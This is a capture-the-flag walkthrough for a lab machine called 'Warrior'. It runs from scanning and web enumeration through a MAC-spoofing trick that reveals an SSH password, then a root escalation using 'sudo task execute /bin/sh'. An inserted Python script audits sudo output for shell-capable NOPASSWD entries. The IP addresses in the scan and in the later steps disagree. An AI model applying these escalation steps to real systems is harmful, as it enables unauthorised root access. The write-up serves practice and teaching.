[HMV] Warrior
0x00 Setup
Attacker IP: 172.16.1.25
Target IP: 172.16.1.177
0x01 Attack
Scan the target for open ports with Nmap
┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.59
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:56 CST
Nmap scan report for 172.16.1.59
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 25168d636b75f05955d4b02d758de0e6 (RSA)
| 256 1e29d0f4c595e740302b35f7a3bc3675 (ECDSA)
|_ 256 ccb152b3d7efcd734cfcf6b55177eaf3 (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:3D:32:60 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
Ports 22 (SSH) and 80 (HTTP) are open; go straight to the web service.
The page is empty, so enumerate directories.
┌──(root㉿Kali-VM)-[~]
└─# dirsearch -u http://172.16.1.59/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/172.16.1.59/-_23-03-23_08-57-10.txt
Error Log: /root/.dirsearch/logs/errors-23-03-23_08-57-10.log
Target: http://172.16.1.59/
[08:57:10] Starting:
[08:57:15] 301 - 169B - /admin -> http://172.16.1.59/admin/
[08:57:15] 403 - 555B - /admin/
[08:57:15] 403 - 555B - /admin/?/login
[08:57:23] 200 - 31B - /index.html
[08:57:30] 200 - 137B - /robots.txt
[08:57:33] 200 - 5B - /user.txt
Task Completed
Several paths turned up; check robots.txt first.
Disallow:/admin
Disallow:/secret.txt
Disallow:/uploads/id_rsa
Disallow:/internal.php
Disallow:/internal
Disallow:/cms
Disallow:/user.txt
robots.txt lists the paths found by the scan; see what each one returns.
/admin -> 403
/secret.txt -> 0123456789ABCDEF
/uploads/id_rsa -> 404
/internal.php -> Hey bro, you need to have an internal MAC as 00:00:00:00:00:a? to read your pass..
/internal -> 404
/cms -> 404
/user.txt -> loco
/internal.php hints that the password is only revealed when the internal MAC address is 00:00:00:00:00:a?, so Kali's MAC address has to be changed; AF turned out to be the right value.
┌──(root㉿Kali-VM)-[~]
└─# curl http://172.16.1.177/internal.php
<br>Good!!!!!<!-- Your password is: Zurviv0r1 -->
That gives the password. Logging in as loco fails; logging in as bro succeeds.
[C:\~]$ ssh bro@172.16.1.177
Connecting to 172.16.1.177:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].
Linux warrior 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 8 04:03:20 2022 from 192.168.1.51
bro@warrior:~$ id
uid=1000(bro) gid=1000(bro) groups=1000(bro),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bro@warrior:~$ whoami
bro
Get the user flag
bro@warrior:~$ ls -al ~
total 32
drwxr-xr-x 3 bro bro 4096 Mar 22 21:17 .
drwxr-xr-x 3 root root 4096 Feb 8 2022 ..
-rw-r--r-- 1 bro bro 220 Feb 8 2022 .bash_logout
-rw-r--r-- 1 bro bro 3526 Feb 8 2022 .bashrc
drwxr-xr-x 3 bro bro 4096 Feb 8 2022 .local
-rw-r--r-- 1 bro bro 807 Feb 8 2022 .profile
-rw------- 1 bro bro 21 Feb 8 2022 user.txt
-rw------- 1 bro bro 53 Mar 22 21:17 .Xauthority
bro@warrior:~$ cat ~/user.txt
LcHHbXGHMVhCpQHvqDen
List all users with a login shell
bro@warrior:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
bro:x:1000:1000:bro,,,:/home/bro:/bin/bash
Only bro and root exist, so the path goes straight to root. Check for SUID binaries.
bro@warrior:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/sudo
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/sudo is present; list the commands bro may run with sudo.
bro@warrior:~$ /usr/sbin/sudo -l
Matching Defaults entries for bro on warrior:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bro may run the following commands on warrior:
(root) NOPASSWD: /usr/bin/task
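Added here as a defender's-side example, not part of the original writeup: a small Python audit that parses `sudo -l` output in the format shown above and flags NOPASSWD entries running as root through binaries that GTFOBins lists as able to spawn a shell, which is exactly what `task` allows on this box. The sample output is constructed from the box's entries plus one made-up, password-required apt-get line for contrast.

```python
import os
import re
from dataclasses import dataclass

# Binaries that GTFOBins documents as able to hand the caller a shell when run
# under sudo; `task` is the one this box exposes.
SHELL_CAPABLE = {"task", "vim", "vi", "less", "more", "find", "python3",
                 "perl", "bash", "sh", "env", "awk"}

# Constructed sample: the box's `sudo -l` output plus one invented apt-get entry.
SUDO_L_OUTPUT = r"""Matching Defaults entries for bro on warrior:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bro may run the following commands on warrior:
    (root) NOPASSWD: /usr/bin/task
    (root) /usr/bin/apt-get update
"""

# One rule line: "(runas[: group]) [TAG: TAG: ...] command [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

@dataclass
class SudoEntry:
    runas: str
    nopasswd: bool
    command: str

    @property
    def binary(self) -> str:
        return os.path.basename(self.command.split()[0])

    @property
    def risky(self) -> bool:
        # Passwordless root via a shell-capable binary is a direct root shell.
        runas_user = self.runas.split(":")[0].strip()
        return self.nopasswd and runas_user in ("root", "ALL") and self.binary in SHELL_CAPABLE

def parse_sudo_l(text: str) -> list:
    entries, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True          # rule lines start after this header
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            entries.append(SudoEntry(m.group("runas"), "NOPASSWD" in tags, m.group("cmd").strip()))
    return entries

def risky_entries(text: str) -> list:
    return [e for e in parse_sudo_l(text) if e.risky]

if __name__ == "__main__":
    for e in risky_entries(SUDO_L_OUTPUT):
        print(f"RISKY: ({e.runas}) NOPASSWD {e.command} -> {e.binary} can spawn a shell")
```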
GTFOBins shows that task can be used for privilege escalation.
bro@warrior:~$ /usr/sbin/sudo /usr/bin/task execute /bin/sh
# su
root@warrior:/home/bro# ls -al
total 32
drwxr-xr-x 3 bro bro 4096 Mar 22 21:17 .
drwxr-xr-x 3 root root 4096 Feb 8 2022 ..
-rw-r--r-- 1 bro bro 220 Feb 8 2022 .bash_logout
-rw-r--r-- 1 bro bro 3526 Feb 8 2022 .bashrc
drwxr-xr-x 3 bro bro 4096 Feb 8 2022 .local
-rw-r--r-- 1 bro bro 807 Feb 8 2022 .profile
-rw------- 1 bro bro 21 Feb 8 2022 user.txt
-rw------- 1 bro bro 53 Mar 22 21:17 .Xauthority
root@warrior:/home/bro# cd
root@warrior:~# cat root.txt
HPiGHMVcDNLlXbHLydMv
0x02 Summary
Changing the MAC address is a bit of a hassle.